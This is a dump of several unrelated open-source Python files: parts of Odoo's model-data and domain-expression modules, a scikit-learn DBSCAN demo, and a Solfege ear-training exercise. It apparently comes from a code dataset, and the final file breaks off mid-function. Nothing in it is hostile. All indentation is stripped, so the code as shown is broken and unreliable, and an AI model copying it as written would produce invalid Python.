# In update mode, do not update a record if it's ir.model.data is flagged as noupdate
if mode == 'update' and noupdate_imd:
return res_id2
if not real_id2:
self.clear_caches()
cr.execute('delete from ir_model_data where id=%s', (imd_id2,))
res_id = False
else:
assert model == real_model, "External ID conflict, %s already refers to a `%s` record,"\
" you can't define a `%s` record with this ID." % (xml_id, real_model, model)
res_id,action_id = res_id2,imd_id2
if action_id and res_id:
model_obj.write(cr, uid, [res_id], values, context=context)
self.write(cr, SUPERUSER_ID, [action_id], {
'date_update': time.strftime('%Y-%m-%d %H:%M:%S'),
},context=context)
elif res_id:
model_obj.write(cr, uid, [res_id], values, context=context)
if xml_id:
if model_obj._inherits:
for table in model_obj._inherits:
inherit_id = model_obj.browse(cr, uid,
res_id,context=context)[model_obj._inherits[table]]
self.create(cr, SUPERUSER_ID, {
'name': xml_id + '_' + table.replace('.', '_'),
'model': table,
'module': module,
'res_id': inherit_id.id,
'noupdate': noupdate,
},context=context)
self.create(cr, SUPERUSER_ID, {
'name': xml_id,
'model': model,
'module':module,
'res_id':res_id,
'noupdate': noupdate,
},context=context)
else:
if mode=='init' or (mode=='update' and xml_id):
inherit_xml_ids = []
if xml_id:
for table, field_name in model_obj._inherits.items():
xml_ids = self.pool['ir.model.data'].search(cr, uid, [
('module', '=', module),
('name', '=', xml_id + '_' + table.replace('.', '_')),
], context=context)
# XML ID found in the database, try to recover an existing record
if xml_ids:
found_xml_id = self.pool['ir.model.data'].browse(cr, uid, xml_ids[0], context=context)
record = self.pool[found_xml_id.model].browse(cr, uid, [found_xml_id.res_id], context=context)[0]
# The record exists, store the id and don't recreate the XML ID
if record.exists():
inherit_xml_ids.append(found_xml_id.model)
values[field_name] = found_xml_id.res_id
# Orphan XML ID, delete it
else:
found_xml_id.unlink()
res_id = model_obj.create(cr, uid, values, context=context)
if xml_id:
if model_obj._inherits:
for table in model_obj._inherits:
if table in inherit_xml_ids:
continue
inherit_id = model_obj.browse(cr, uid,
res_id,context=context)[model_obj._inherits[table]]
self.create(cr, SUPERUSER_ID, {
'name': xml_id + '_' + table.replace('.', '_'),
'model': table,
'module': module,
'res_id': inherit_id.id,
'noupdate': noupdate,
},context=context)
self.create(cr, SUPERUSER_ID, {
'name': xml_id,
'model': model,
'module': module,
'res_id': res_id,
'noupdate': noupdate
},context=context)
if xml_id and res_id:
self.loads[(module, xml_id)] = (model, res_id)
for table, inherit_field in model_obj._inherits.iteritems():
inherit_id = model_obj.read(cr, uid, [res_id],
[inherit_field])[0][inherit_field]
self.loads[(module, xml_id + '_' + table.replace('.', '_'))] = (table, inherit_id)
return res_id
def ir_set(self, cr, uid, key, key2, name, models, value, replace=True, isobject=False, meta=None, xml_id=False):
ir_values_obj = openerp.registry(cr.dbname)['ir.values']
ir_values_obj.set(cr, uid, key, key2, name, models, value, replace, isobject, meta)
return True
def _module_data_uninstall(self, cr, uid, modules_to_remove, context=None):
"""Deletes all the records referenced by the ir.model.data entries
``ids`` along with their corresponding database backed (including
dropping tables, columns, FKs, etc, as long as there is no other
ir.model.data entry holding a reference to them (which indicates that
they are still owned by another module).
Attempts to perform the deletion in an appropriate order to maximize
the chance of gracefully deleting all records.
This step is performed as part of the full uninstallation of a module.
"""
ids = self.search(cr, uid, [('module', 'in', modules_to_remove)])
if uid != 1 and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
context = dict(context or {})
context[MODULE_UNINSTALL_FLAG] = True # enable model/field deletion
ids_set = set(ids)
wkf_todo = []
to_unlink = []
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model
res_id = data.res_id
pair_to_unlink = (model, res_id)
if pair_to_unlink not in to_unlink:
to_unlink.append(pair_to_unlink)
if model == 'workflow.activity':
# Special treatment for workflow activities: temporarily revert their
# incoming transition and trigger an update to force all workflow items
# to move out before deleting them
cr.execute('select res_type,res_id from wkf_instance where id IN (select inst_id from wkf_workitem where act_id=%s)', (res_id,))
wkf_todo.extend(cr.fetchall())
cr.execute("update wkf_transition set condition='True', group_id=NULL, signal=NULL,act_to=act_from,act_from=%s where act_to=%s", (res_id,res_id))
self.invalidate_cache(cr, uid, context=context)
for model,res_id in wkf_todo:
try:
openerp.workflow.trg_write(uid, model, res_id, cr)
except Exception:
_logger.info('Unable to force processing of workflow for item %s@%s in order to leave activity to be deleted', res_id, model, exc_info=True)
def unlink_if_refcount(to_unlink):
for model, res_id in to_unlink:
external_ids = self.search(cr, uid, [('model', '=', model),('res_id', '=', res_id)])
if set(external_ids)-ids_set:
# if other modules have defined this record, we must not delete it
continue
if model == 'ir.model.fields':
# Don't remove the LOG_ACCESS_COLUMNS unless _log_access
# has been turned off on the model.
field = self.pool[model].browse(cr, uid, [res_id], context=context)[0]
if not field.exists():
_logger.info('Deleting orphan external_ids %s', external_ids)
self.unlink(cr, uid, external_ids)
continue
if field.name in openerp.models.LOG_ACCESS_COLUMNS and self.pool[field.model]._log_access:
continue
if field.name == 'id':
continue
_logger.info('Deleting %s@%s', res_id, model)
try:
cr.execute('SAVEPOINT record_unlink_save')
self.pool[model].unlink(cr, uid, [res_id], context=context)
except Exception:
_logger.info('Unable to delete %s@%s', res_id, model, exc_info=True)
cr.execute('ROLLBACK TO SAVEPOINT record_unlink_save')
else:
cr.execute('RELEASE SAVEPOINT record_unlink_save')
# Remove non-model records first, then model fields, and finish with models
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model not in ('ir.model','ir.model.fields','ir.model.constraint'))
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model.constraint')
ir_module_module = self.pool['ir.module.module']
ir_model_constraint = self.pool['ir.model.constraint']
modules_to_remove_ids = ir_module_module.search(cr, uid, [('name', 'in', modules_to_remove)], context=context)
constraint_ids = ir_model_constraint.search(cr, uid, [('module', 'in', modules_to_remove_ids)], context=context)
ir_model_constraint._module_data_uninstall(cr, uid, constraint_ids, context)
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model.fields')
ir_model_relation = self.pool['ir.model.relation']
relation_ids = ir_model_relation.search(cr, uid, [('module', 'in', modules_to_remove_ids)])
ir_model_relation._module_data_uninstall(cr, uid, relation_ids, context)
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model')
cr.commit()
self.unlink(cr, uid, ids, context)
def _process_end(self, cr, uid, modules):
""" Clear records removed from updated module data.
This method is called at the end of the module loading process.
It is meant to removed records that are no longer present in the
updated data. Such records are recognised as the one with an xml id
and a module in ir_model_data and noupdate set to false, but not
present in self.loads.
"""
if not modules or config.get('import_partial'):
return True
bad_imd_ids = []
context = {MODULE_UNINSTALL_FLAG: True}
cr.execute("""SELECT id,name,model,res_id,module FROM ir_model_data
WHERE module IN %s AND res_id IS NOT NULL AND noupdate=%s ORDER BY id DESC
""", (tuple(modules), False))
for (id, name, model, res_id, module) in cr.fetchall():
if (module, name) not in self.loads:
if model in self.pool:
_logger.info('Deleting %s@%s (%s.%s)', res_id, model, module, name)
if self.pool[model].exists(cr, uid, [res_id], context=context):
self.pool[model].unlink(cr, uid, [res_id], context=context)
else:
bad_imd_ids.append(id)
if bad_imd_ids:
self.unlink(cr, uid, bad_imd_ids, context=context)
self.loads.clear()
class wizard_model_menu(osv.osv_memory):
_name = 'wizard.ir.model.menu.create'
_columns = {
'menu_id': fields.many2one('ir.ui.menu', 'Parent Menu', required=True),
'name': fields.char('Menu Name', required=True),
}
def menu_create(self, cr, uid, ids, context=None):
if not context:
context = {}
model_pool = self.pool.get('ir.model')
for menu in self.browse(cr, uid, ids, context):
model = model_pool.browse(cr, uid, context.get('model_id'), context=context)
val = {
'name': menu.name,
'res_model': model.model,
'view_type': 'form',
'view_mode': 'tree,form'
}
action_id = self.pool.get('ir.actions.act_window').create(cr, uid, val)
self.pool.get('ir.ui.menu').create(cr, uid, {
'name': menu.name,
'parent_id': menu.menu_id.id,
'action': 'ir.actions.act_window,%d' % (action_id,),
'icon': 'STOCK_INDENT'
}, context)
return {'type':'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
davidgbe/scikit-learn
|
refs/heads/master
|
examples/cluster/plot_dbscan.py
|
346
|
# -*- coding: utf-8 -*-
"""
===================================
Demo of DBSCAN clustering algorithm
===================================
Finds core samples of high density and expands clusters from them.
"""
print(__doc__)
import numpy as np
from sklearn.cluster import DBSCAN
from sklearn import metrics
from sklearn.datasets.samples_generator import make_blobs
from sklearn.preprocessing import StandardScaler
##############################################################################
# Generate sample data
centers = [[1, 1], [-1, -1], [1, -1]]
X, labels_true = make_blobs(n_samples=750, centers=centers, cluster_std=0.4,
random_state=0)
X = StandardScaler().fit_transform(X)
##############################################################################
# Compute DBSCAN
db = DBSCAN(eps=0.3, min_samples=10).fit(X)
core_samples_mask = np.zeros_like(db.labels_, dtype=bool)
core_samples_mask[db.core_sample_indices_] = True
labels = db.labels_
# Number of clusters in labels, ignoring noise if present.
n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
print('Estimated number of clusters: %d' % n_clusters_)
print("Homogeneity: %0.3f" % metrics.homogeneity_score(labels_true, labels))
print("Completeness: %0.3f" % metrics.completeness_score(labels_true, labels))
print("V-measure: %0.3f" % metrics.v_measure_score(labels_true, labels))
print("Adjusted Rand Index: %0.3f"
% metrics.adjusted_rand_score(labels_true, labels))
print("Adjusted Mutual Information: %0.3f"
% metrics.adjusted_mutual_info_score(labels_true, labels))
print("Silhouette Coefficient: %0.3f"
% metrics.silhouette_score(X, labels))
##############################################################################
# Plot result
import matplotlib.pyplot as plt
# Black removed and is used for noise instead.
unique_labels = set(labels)
colors = plt.cm.Spectral(np.linspace(0, 1, len(unique_labels)))
for k, col in zip(unique_labels, colors):
if k == -1:
# Black used for noise.
col = 'k'
class_member_mask = (labels == k)
xy = X[class_member_mask & core_samples_mask]
plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=col,
markeredgecolor='k', markersize=14)
xy = X[class_member_mask & ~core_samples_mask]
plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=col,
markeredgecolor='k', markersize=6)
plt.title('Estimated number of clusters: %d' % n_clusters_)
plt.show()
|
yuanyelele/solfege
|
refs/heads/master
|
solfege/exercises/idtone.py
|
2
|
# GNU Solfege - free ear training software
# Copyright (C) 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2011 Tom Cato Amundsen
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
import random
import os
from gi.repository import GObject
from gi.repository import Gtk
from solfege import abstract
from solfege import gu
from solfege import inputwidgets
from solfege import lessonfile
from solfege import mpd
from solfege import soundcard
from solfege import statistics, statisticsviewer
from solfege import utils
import solfege
class Teacher(abstract.Teacher):
#FIXME the following lines
OK, ERR_PICKY, ERR_TONES = range(3)
ERR_PICKY = 1
ERR_CONFIG = 2
OCTAVES = [-2, -1, 0, 1, 2, 3]
def __init__(self, exname):
abstract.Teacher.__init__(self, exname)
self.lessonfileclass = lessonfile.HeaderLessonfile
self.m_statistics = statistics.IdToneStatistics(self)
self.m_ask_tones = {}
self.m_question = None
self.m_custom_mode = False
def new_question(self):
"""
Return values:
OK: sucess, new random tone selected
ERR_PICKY: fail, you are not allowed to select a new tone before you
can identify the one you have now.
ERR_CONFIG: fail, all notes have zero weight or no octaves selected
"""
if self.m_timeout_handle:
GObject.source_remove(self.m_timeout_handle)
self.m_timeout_handle = None
if self.get_bool('config/picky_on_new_question') \
and self.q_status in (self.QSTATUS_NEW, self.QSTATUS_WRONG):
return Teacher.ERR_PICKY
self.m_is_first_question = self.q_status == self.QSTATUS_NO
v = []
for n in mpd.MusicalPitch.notenames:
v.extend([n] * self.get_int(n+"_weight"))
if not v:
return self.ERR_CONFIG
self.m_question = random.choice(v)
v = []
for n in self.OCTAVES:
if self.get_bool("octave"+str(n)):
v.append(n)
if not v:
return self.ERR_CONFIG
self.m_octave = random.choice(v)
self.q_status = self.QSTATUS_NEW
return self.OK
def guess_answer(self, notename):
if notename == self.m_question:
if self.q_status == self.QSTATUS_NEW:
self.m_statistics.add_correct(notename)
self.maybe_auto_new_question()
self.q_status = self.QSTATUS_SOLVED
return 1
else:
if self.q_status == self.QSTATUS_NEW:
self.m_statistics.add_wrong(self.m_question, notename)
self.q_status = self.QSTATUS_WRONG
def play_question(self):
if self.q_status == self.QSTATUS_NO:
return
utils.play_note(4,
mpd.notename_to_int(self.m_question) + self.m_octave * 12)
def give_up(self):
self.q_status = self.QSTATUS_GIVE_UP
def spank_me_play_question(self):
t1 = utils.new_percussion_track()
t1.note(8, 71)
t2 = utils.new_track()
t2.notelen_time(4)
t2.note(4, mpd.notename_to_int(self.m_question)+self.m_octave*12)
soundcard.synth.play_track(t1, t2)
def spank_me(self):
utils.play_perc(4, 71)
class Gui(abstract.Gui):
def __init__(self, teacher):
abstract.Gui.__init__(self, teacher)
self.g_percentage = gu.bLabel(self.practise_box, "")
self.g_percentage.set_name("Heading1")
self.g_piano = inputwidgets.PianoOctaveWithAccelName(
self.on_answer_from_user, self.get_accel_key_list())
self.g_piano.m_visible_accels = not self.get_bool('hide_piano_accels')
def update_accels(*ignore):
self.g_piano.m_keys = self.get_accel_key_list()
self.g_piano.queue_draw()
for notename in mpd.MusicalPitch.notenames:
self.add_watch('tone_%s_ak' % notename, update_accels)
self.practise_box.pack_start(self.g_piano, True, True, 0)
self.g_flashbar = gu.FlashBar()
self.g_flashbar.show()
self.practise_box.pack_start(self.g_flashbar, False, False, 0)
self.practise_box.set_spacing(gu.PAD)
self.std_buttons_add(
('new-tone', self.new_question),
('repeat', lambda _o, self=self: self.m_t.play_question()),
('give_up', self.give_up))
self.practise_box.show_all()
##############
# config_box #
##############
self.config_box.set_spacing(gu.PAD_SMALL)
self.g_config_elems = gu.bVBox(self.config_box, False)
table = Gtk.Table()
table.set_border_width(gu.PAD_SMALL)
frame = Gtk.Frame(label=_("Weight"))
self.g_config_elems.pack_start(frame, False, False, 0)
frame.add(table)
for x, n in [(1, 'cis'), (3, 'dis'), (7, 'fis'),
(9, 'gis'), (11, 'ais')]:
label = Gtk.Label(label=mpd.MusicalPitch.new_from_notename(n).get_user_notename())
label.set_name("Heading2")
label.set_alignment(0.2, 1.0)
table.attach(label, x, x+2, 0, 1, xoptions=Gtk.AttachOptions.FILL)
b = gu.nSpinButton(self.m_exname, n+"_weight",
Gtk.Adjustment(1, 0, 1000, 1, 10), digits=0)
table.attach(b, x, x+2, 1, 2, xoptions=Gtk.AttachOptions.FILL)
for x, n in [(0, 'c'), (2, 'd'), (4, 'e'), (6, 'f'),
(8, 'g'), (10, 'a'), (12, 'b')]:
label = Gtk.Label(label=mpd.MusicalPitch.new_from_notename(n).get_user_notename())
label.set_name("Heading2")
label.set_alignment(0.35, 1.0)
table.attach(label, x, x+2, 2, 3, xoptions=Gtk.AttachOptions.FILL)
b = gu.nSpinButton(self.m_exname, n+"_weight",
Gtk.Adjustment(1, 0, 1000, 1, 10), digits=0)
table.attach(b, x, x+2, 3, 4, xoptions=Gtk.AttachOptions.FILL)
hbox = gu.bHBox(self.g_config_elems, False)
hbox.pack_start(Gtk.Label(_("Octave:")), False, False, padding=4)
for oct in self.m_t.OCTAVES:
b = gu.nCheckButton(self.m_exname, "octave"+str(oct), str(oct),
default_value=1)
hbox.pack_start(b, False, False, 0)
#############
self._add_auto_new_question_gui(self.config_box)
#############
b = gu.nCheckButton('idtone', 'hide_piano_accels', _("Hide _piano keyboard shortcuts"), False)
def show_hide_accels(checkbutton):
self.g_piano.m_visible_accels = not b.get_active()
b.connect('clicked', show_hide_accels)
self.config_box.pack_start(b, False, False, 0)
#
frame = Gtk.Frame(label=_("When you guess wrong"))
vbox = Gtk.VBox()
vbox.set_border_width(gu.PAD_SMALL)
frame.add(vbox)
vbox.pack_start(gu.nCheckButton(self.m_exname,
"warning_sound", _("Play warning sound")), False, False, 0)
self.config_box.pack_start(frame, False, False, 0)
self.config_box.show_all()
##############
# statistics #
##############
self.setup_statisticsviewer(statisticsviewer.StatisticsViewer,
_("Identify tone"))
def get_accel_key_list(self):
v = []
for k in mpd.MusicalPitch.notenames:
self.m_key_bindings['tone_%s_ak' % k] \
= lambda self=self, k=k: self.on_answer_from_user(k)
v.append(self.get_string('tone_%s_ak' % k))
return v
def new_question(self, widget=None):
s = self.m_t.q_status
g = self.m_t.new_question()
if g == Teacher.ERR_CONFIG:
solfege.win.display_error_message(
_("""You have to select some tones practise. Do this on the config page by setting the weight of tones to a value greater than zero."""))
return
elif g == Teacher.OK:
self.std_buttons_new_question()
try:
if self.m_t.m_is_first_question:
self.flash_and_play_first_tone()
else:
self.g_flashbar.clear()
self.m_t.play_question()
except Exception,e:
def cleanup():
self.std_buttons_exception_cleanup()
if not self.standard_exception_handler(e, cleanup):
raise
self.set_percentage_label()
def flash_and_play_first_tone(self):
self.g_flashbar.flash(_("First tone is %s") % mpd.MusicalPitch.new_from_notename(self.m_t.m_question).get_user_notename())
self.m_t.play_question()
def on_answer_from_user(self, notename):
if self.m_t.q_status == self.QSTATUS_NO:
self.g_flashbar.flash(_("Click 'New tone' to begin."))
return
elif self.m_t.q_status == self.QSTATUS_SOLVED:
if self.m_t.guess_answer(notename):
self.g_flashbar.flash(_("Correct, but you have already solved this question"))
else:
self.g_flashbar.flash(_("Wrong, but you have already solved this question"))
elif self.m_t.q_status in (self.QSTATUS_NEW, self.QSTATUS_WRONG):
if self.m_t.guess_answer(notename):
self.g_flashbar.flash(_("Correct"))
self.std_buttons_answer_correct()
else:
try:
if self.m_t.m_is_first_question:
self.flash_and_play_first_tone()
return
self.g_flashbar.flash(_("Wrong"))
self.std_buttons_answer_wrong()
if self.get_bool("warning_sound"):
if self.get_bool("config/auto_repeat_question_if_wrong_answer"):
self.m_t.spank_me_play_question()
else:
self.m_t.spank_me()
else:
if self.get_bool("config/auto_repeat_question_if_wrong_answer"):
self.m_t.play_question()
except Exception, e:
if not self.standard_exception_handler(e):
raise
self.set_percentage_label()
def give_up(self, _o=None):
if self.m_t.q_status == self.QSTATUS_WRONG:
self.g_flashbar.push(_("The answer is: %s")
% mpd.MusicalPitch.new_from_notename(self.m_t.m_question).get_user_notename())
self.m_t.give_up()
self.std_buttons_give_up()
def set_percentage_label(self):
self.g_percentage.set_text("%.1f %%" % (self.m_t.m_statistics.get_percentage_correct()))
def on_start_practise(self):
self.m_t.m_custom_mode = not (
('white_keys_weight' in self.m_t.m_P.header)
or ('black_keys_weight' in self.m_t.m_P.header))
super(Gui, self).on_start_practise()
self.g_flashbar.require_size([
_("Click 'New tone' to begin."),
_("Correct, but you have already solved this question"),
_("Wrong, but you have already solved this question"),
])
if self.m_t.m_custom_mode:
for notename, value in zip(mpd.MusicalPitch.notenames,
self.get_list('custom_mode_cfg')):
try:
value = float(value)
except ValueError:
value = 0.0
self.set_float('%s_weight' % notename, value)
else:
if 'white_keys_weight' in self.m_t.m_P.header:
if type(self.m_t.m_P.header.white_keys_weight) == list \
and len(self.m_t.m_P.header.white_keys_weight) == 7:
for idx, n in enumerate(mpd.MusicalPitch.natural_notenames):
try:
weight = float(self.m_t.m_P.header.white_keys_weight[idx])
except ValueError:
weight = 0.0
self.set_float('%s_weight' % n, weight)
else:
gu.dialog_ok("The white_keys_weight variable in the lesson file '%s' had wrong type" % os.path.abspath(self.m_t.m_P.m_filename), msgtype=Gtk.MessageType.WARNING)
else:
for idx, n in enumerate(mpd.MusicalPitch.notenames):
self.set_float('%s_weight' % n, 0.0)
if 'black_keys_weight' in self.m_t.m_P.header:
if type(self.m_t.m_P.header.black_keys_weight) == list \
and len(self.m_t.m_P.header.black_keys_weight) == 5:
for idx, n in enumerate(mpd.MusicalPitch.sharp_notenames):
try:
weight = float(self.m_t.m_P.header.black_keys_weight[idx])
except ValueError:
weight = 0.0
self.set_float('%s_weight' % n, weight)
else:
gu.dialog_ok("The black_keys_weight variable in the lesson file '%s' had wrong type" % os.path.abspath(self.m_t.m_P.m_filename), msgtype=Gtk.MessageType.WARNING)
else:
for idx, n in enumerate(('cis', 'dis', 'fis', 'gis', 'ais')):
self.set_float('%s_weight' % n, 0.0)
if self.m_t.m_custom_mode:
self.g_config_elems.show()
self.m_t.m_statistics.reset_custom_mode_session(self.m_t.m_P.m_filename)
else:
self.g_config_elems.hide()
self.m_t.m_statistics.reset_session()
self.g_statview.g_heading.set_text("%s - %s" % (_("Identify tone"), self.m_t.m_P.header.title))
self.set_percentage_label()
self.g_flashbar.delayed_flash(self.short_delay,
_("Click 'New tone' to begin."))
self.std_buttons_start_practise()
self.m_t.q_status = self.QSTATUS_NO
def on_end_practise(self):
if self.m_t.m_custom_mode:
self.set_list('custom_mode_cfg', [self.get_float('%s_weight' % x)
for x in mpd.MusicalPitch.notenames])
self.m_t.end_practise()
self.std_buttons_end_practise()
|
Jgarcia-IAS/Fidelizacion_odoo
|
refs/heads/master
|
openerp/osv/expression.py
|
42
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Domain expression processing
The main duty of this module is to compile a domain expression into a
SQL query. A lot of things should be documented here, but as a first
step in the right direction, some tests in test_osv_expression.yml
might give you some additional information.
For legacy reasons, a domain uses an inconsistent two-levels abstract
syntax (domains are regular Python data structures). At the first
level, a domain is an expression made of terms (sometimes called
leaves) and (domain) operators used in prefix notation. The available
operators at this level are '!', '&', and '|'. '!' is a unary 'not',
'&' is a binary 'and', and '|' is a binary 'or'. For instance, here
is a possible domain. (<term> stands for an arbitrary term, more on
this later.)::
['&', '!', <term1>, '|', <term2>, <term3>]
It is equivalent to this pseudo code using infix notation::
(not <term1>) and (<term2> or <term3>)
The second level of syntax deals with the term representation. A term
is a triple of the form (left, operator, right). That is, a term uses
an infix notation, and the available operators, and possible left and
right operands differ with those of the previous level. Here is a
possible term::
('company_id.name', '=', 'OpenERP')
The left and right operand don't have the same possible values. The
left operand is field name (related to the model for which the domain
applies). Actually, the field name can use the dot-notation to
traverse relationships. The right operand is a Python value whose
type should match the used operator and field type. In the above
example, a string is used because the name field of a company has type
string, and because we use the '=' operator. When appropriate, a 'in'
operator can be used, and thus the right operand should be a list.
Note: the non-uniform syntax could have been more uniform, but this
would hide an important limitation of the domain syntax. Say that the
term representation was ['=', 'company_id.name', 'OpenERP']. Used in a
complete domain, this would look like::
['!', ['=', 'company_id.name', 'OpenERP']]
and you would be tempted to believe something like this would be
possible::
['!', ['=', 'company_id.name', ['&', ..., ...]]]
That is, a domain could be a valid operand. But this is not the
case. A domain is really limited to a two-level nature, and can not
take a recursive form: a domain is not a valid second-level operand.
Unaccent - Accent-insensitive search
OpenERP will use the SQL function 'unaccent' when available for the
'ilike' and 'not ilike' operators, and enabled in the configuration.
Normally the 'unaccent' function is obtained from `the PostgreSQL
'unaccent' contrib module
<http://developer.postgresql.org/pgdocs/postgres/unaccent.html>`_.
.. todo: The following explanation should be moved in some external
installation guide
The steps to install the module might differ on specific PostgreSQL
versions. We give here some instruction for PostgreSQL 9.x on a
Ubuntu system.
Ubuntu doesn't come yet with PostgreSQL 9.x, so an alternative package
source is used. We use Martin Pitt's PPA available at
`ppa:pitti/postgresql
<https://launchpad.net/~pitti/+archive/postgresql>`_.
.. code-block:: sh
> sudo add-apt-repository ppa:pitti/postgresql
> sudo apt-get update
Once the package list is up-to-date, you have to install PostgreSQL
9.0 and its contrib modules.
.. code-block:: sh
> sudo apt-get install postgresql-9.0 postgresql-contrib-9.0
When you want to enable unaccent on some database:
.. code-block:: sh
> psql9 <database> -f /usr/share/postgresql/9.0/contrib/unaccent.sql
Here :program:`psql9` is an alias for the newly installed PostgreSQL
9.0 tool, together with the correct port if necessary (for instance if
PostgreSQL 8.4 is running on 5432). (Other aliases can be used for
createdb and dropdb.)
.. code-block:: sh
> alias psql9='/usr/lib/postgresql/9.0/bin/psql -p 5433'
You can check unaccent is working:
.. code-block:: sh
> psql9 <database> -c"select unaccent('hélène')"
Finally, to instruct OpenERP to really use the unaccent function, you have to
start the server specifying the ``--unaccent`` flag.
"""
import collections
import logging
import traceback
import openerp.modules
from . import fields
from ..models import MAGIC_COLUMNS, BaseModel
import openerp.tools as tools
# Domain operators.
NOT_OPERATOR = '!'
OR_OPERATOR = '|'
AND_OPERATOR = '&'
DOMAIN_OPERATORS = (NOT_OPERATOR, OR_OPERATOR, AND_OPERATOR)
# List of available term operators. It is also possible to use the '<>'
# operator, which is strictly the same as '!='; the later should be prefered
# for consistency. This list doesn't contain '<>' as it is simpified to '!='
# by the normalize_operator() function (so later part of the code deals with
# only one representation).
# Internals (i.e. not available to the user) 'inselect' and 'not inselect'
# operators are also used. In this case its right operand has the form (subselect, params).
TERM_OPERATORS = ('=', '!=', '<=', '<', '>', '>=', '=?', '=like', '=ilike',
'like', 'not like', 'ilike', 'not ilike', 'in', 'not in',
'child_of')
# A subset of the above operators, with a 'negative' semantic. When the
# expressions 'in NEGATIVE_TERM_OPERATORS' or 'not in NEGATIVE_TERM_OPERATORS' are used in the code
# below, this doesn't necessarily mean that any of those NEGATIVE_TERM_OPERATORS is
# legal in the processed term.
NEGATIVE_TERM_OPERATORS = ('!=', 'not like', 'not ilike', 'not in')
TRUE_LEAF = (1, '=', 1)
FALSE_LEAF = (0, '=', 1)
TRUE_DOMAIN = [TRUE_LEAF]
FALSE_DOMAIN = [FALSE_LEAF]
_logger = logging.getLogger(__name__)
# --------------------------------------------------
# Generic domain manipulation
# --------------------------------------------------
def normalize_domain(domain):
"""Returns a normalized version of ``domain_expr``, where all implicit '&' operators
have been made explicit. One property of normalized domain expressions is that they
can be easily combined together as if they were single domain components.
"""
assert isinstance(domain, (list, tuple)), "Domains to normalize must have a 'domain' form: a list or tuple of domain components"
if not domain:
return TRUE_DOMAIN
result = []
expected = 1 # expected number of expressions
op_arity = {NOT_OPERATOR: 1, AND_OPERATOR: 2, OR_OPERATOR: 2}
for token in domain:
if expected == 0: # more than expected, like in [A, B]
result[0:0] = [AND_OPERATOR] # put an extra '&' in front
expected = 1
result.append(token)
if isinstance(token, (list, tuple)): # domain term
expected -= 1
else:
expected += op_arity.get(token, 0) - 1
assert expected == 0, 'This domain is syntactically not correct: %s' % (domain)
return result
def combine(operator, unit, zero, domains):
"""Returns a new domain expression where all domain components from ``domains``
have been added together using the binary operator ``operator``. The given
domains must be normalized.
:param unit: the identity element of the domains "set" with regard to the operation
performed by ``operator``, i.e the domain component ``i`` which, when
combined with any domain ``x`` via ``operator``, yields ``x``.
E.g. [(1,'=',1)] is the typical unit for AND_OPERATOR: adding it
to any domain component gives the same domain.
:param zero: the absorbing element of the domains "set" with regard to the operation
performed by ``operator``, i.e the domain component ``z`` which, when
combined with any domain ``x`` via ``operator``, yields ``z``.
E.g. [(1,'=',1)] is the typical zero for OR_OPERATOR: as soon as
you see it in a domain component the resulting domain is the zero.
:param domains: a list of normalized domains.
"""
result = []
count = 0
for domain in domains:
if domain == unit:
continue
if domain == zero:
return zero
if domain:
result += domain
count += 1
result = [operator] * (count - 1) + result
return result
def AND(domains):
"""AND([D1,D2,...]) returns a domain representing D1 and D2 and ... """
return combine(AND_OPERATOR, TRUE_DOMAIN, FALSE_DOMAIN, domains)
def OR(domains):
"""OR([D1,D2,...]) returns a domain representing D1 or D2 or ... """
return combine(OR_OPERATOR, FALSE_DOMAIN, TRUE_DOMAIN, domains)
def distribute_not(domain):
""" Distribute any '!' domain operators found inside a normalized domain.
Because we don't use SQL semantic for processing a 'left not in right'
query (i.e. our 'not in' is not simply translated to a SQL 'not in'),
it means that a '! left in right' can not be simply processed
by __leaf_to_sql by first emitting code for 'left in right' then wrapping
the result with 'not (...)', as it would result in a 'not in' at the SQL
level.
This function is thus responsible for pushing any '!' domain operators
inside the terms themselves. For example::
['!','&',('user_id','=',4),('partner_id','in',[1,2])]
will be turned into:
['|',('user_id','!=',4),('partner_id','not in',[1,2])]
"""
def negate(leaf):
"""Negates and returns a single domain leaf term,
using the opposite operator if possible"""
left, operator, right = leaf
mapping = {
'<': '>=',
'>': '<=',
'<=': '>',
'>=': '<',
'=': '!=',
'!=': '=',
}
if operator in ('in', 'like', 'ilike'):
operator = 'not ' + operator
return [(left, operator, right)]
if operator in ('not in', 'not like', 'not ilike'):
operator = operator[4:]
return [(left, operator, right)]
if operator in mapping:
operator = mapping[operator]
return [(left, operator, right)]
return [NOT_OPERATOR, (left, operator, right)]
def distribute_negate(domain):
"""Negate the domain ``subtree`` rooted at domain[0],
leaving the rest of the domain intact, and return
(negated_subtree, untouched_domain_rest)
"""
if is_leaf(domain[0]):
return negate(domain[0]), domain[1:]
if domain[0] == AND_OPERATOR:
done1, todo1 = distribute_negate(domain[1:])
done2, todo2 = distribute_negate(todo1)
